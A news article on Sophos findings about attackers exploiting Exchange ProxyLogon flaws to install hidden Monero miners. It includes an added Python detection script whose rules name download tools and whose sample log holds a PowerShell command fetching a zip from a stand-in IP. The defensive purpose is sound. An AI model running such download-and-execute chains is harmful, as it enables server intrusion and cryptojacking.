As Microsoft released critical updates for its Exchange servers, several zero-day vulnerabilities were uncovered and detailed. Of course, threat actors immediately rushed to exploit these vulnerabilities. Cybercriminals jumped at the opportunity to take advantage of the servers that were still unpatched. These criminal groups ranged from large hacking groups to ransomware gangs. In its research, Sophos reported that, besides a host of malware and ransomware attacks, there were also other payloads aimed at vulnerable servers. Some groups targeted the Microsoft Exchange servers with crypto mining malware to secretly use the processing power of unsuspecting targets.
Sophos’ cybersecurity experts have identified crypto hackers taking advantage of the Microsoft Exchange Server ProxyLogon exploit. This way, they managed to install malicious Monero crypto miners on the Exchange servers. As they were inspecting the telemetry on one of their customers’ servers, Sophos’ researchers came across an “unusual attack”.
Server hardware is a pretty desirable target for cryptojacking. Servers usually carry higher processing power and performance than desktops or laptops, making them perfect for this sort of cyber attack. Thanks to the vulnerability, the hackers can scan the whole internet for unprotected machines. Once identified, those machines are added to the mining network and the money starts rolling in for the attackers.
Monero is one of the favorite cryptocurrencies among these cybercriminals. It is not as valuable as Bitcoin, but it provides a higher level of anonymity. This is crucial for the attackers: the owner of the wallet, and the actors behind the attack, are nearly impossible to trace. Also, it is easier to mine.
According to Sophos, the Monero blockchain showed that the attacker’s wallet began receiving funds on March 9th, mere days after the servers’ vulnerabilities came to light. March 9 was the Patch Tuesday on which Microsoft released the security updates for Exchange servers, so the attackers were quick off the mark to exploit said vulnerabilities.
The attack was initiated with a PowerShell command. It retrieved a zip file from the Outlook Web Access logon path of a previously compromised server. The zip file contained a batch script that called on Windows to install two additional files, which in turn installed a Monero miner. Per the researchers, the executable involved a modified version of a tool, PEx64-Injector, which is publicly available on GitHub. This tool can migrate an x64 executable into any process without requiring admin access. It temporarily writes the miner installer content to the file system.
The miner continues to run in memory while all the evidence of installation is deleted. However, the pools.txt file produced by the miner is temporarily written to the disk and reveals the address and password of the wallet. It also reveals the name the attackers gave their mining pool, “DRUGS”.
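To make the chain described above concrete from a defender's side, here is an added Python example, not code from the article or from Sophos, that checks log records for the three artefacts the article names: a PowerShell download of a zip from the OWA logon path (assumed here to be the `/owa/auth/` URL path), a batch script launching an executable from a temp directory, and `pools.txt` briefly appearing on disk. The `kind|detail` record format, the host address, and the file names are constructed for illustration and are not indicators from the article.

```python
"""Added example: flag the cryptojacking chain described in the article in
simple log records. Record format, addresses and file names are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    record: str


# Each rule is a name plus a regex over a "kind|detail" record.
RULES = [
    # PowerShell pulling a .zip whose URL path goes through the OWA logon
    # folder (assumed to be /owa/auth/) from some other host
    ("powershell_zip_from_owa_auth",
     re.compile(r"^script\|.*(?:Invoke-WebRequest|DownloadFile|DownloadString|curl|wget)"
                r".*/owa/auth/[^\s\"']*\.zip", re.I)),
    # a batch script spawning an executable out of a temp directory
    ("batch_launches_exe_from_temp",
     re.compile(r"^process\|.*parent=.*\.bat.*image=.*\\temp\\[^\s]*\.exe", re.I)),
    # the miner's pool configuration being written to disk, even briefly
    ("pools_txt_written",
     re.compile(r"^filecreate\|.*\\pools\.txt$", re.I)),
]


def scan(records):
    """Return one Finding per (record, rule) match, in record order."""
    findings = []
    for rec in records:
        for name, pattern in RULES:
            if pattern.search(rec):
                findings.append(Finding(name, rec))
    return findings


def summarize(findings):
    """Count findings per rule; a host that trips more than one rule warrants a look."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample records: two benign, three matching the described chain.
SAMPLE_RECORDS = [
    "script|Get-MailboxDatabase | Format-Table Name,Server",
    "filecreate|C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\\Owa\\HttpProxy_2021030900-1.LOG",
    "script|Invoke-WebRequest -Uri http://203.0.113.10/owa/auth/up.zip -OutFile C:\\Windows\\Temp\\up.zip",
    "process|parent=C:\\Windows\\Temp\\run.bat image=C:\\Windows\\Temp\\svc.exe",
    "filecreate|C:\\Windows\\Temp\\pools.txt",
]


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"{f.rule}: {f.record}")
    print(summarize(scan(SAMPLE_RECORDS)))
```

The point of the third rule is the article's own caveat: the installer cleans up after itself and the miner lives in memory, so a file-creation event for `pools.txt` may be the only on-disk trace, and it must be caught as it happens rather than found later.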
The operators of the hijacked servers are unlikely to detect the issue or notice that the server has been hijacked by the Monero miner. As long as the hijackers don’t get greedy and use an excessive amount of processing power, they are likely to go unnoticed. Microsoft has urged all organizations to urgently apply the security updates to protect their networks from these attacks.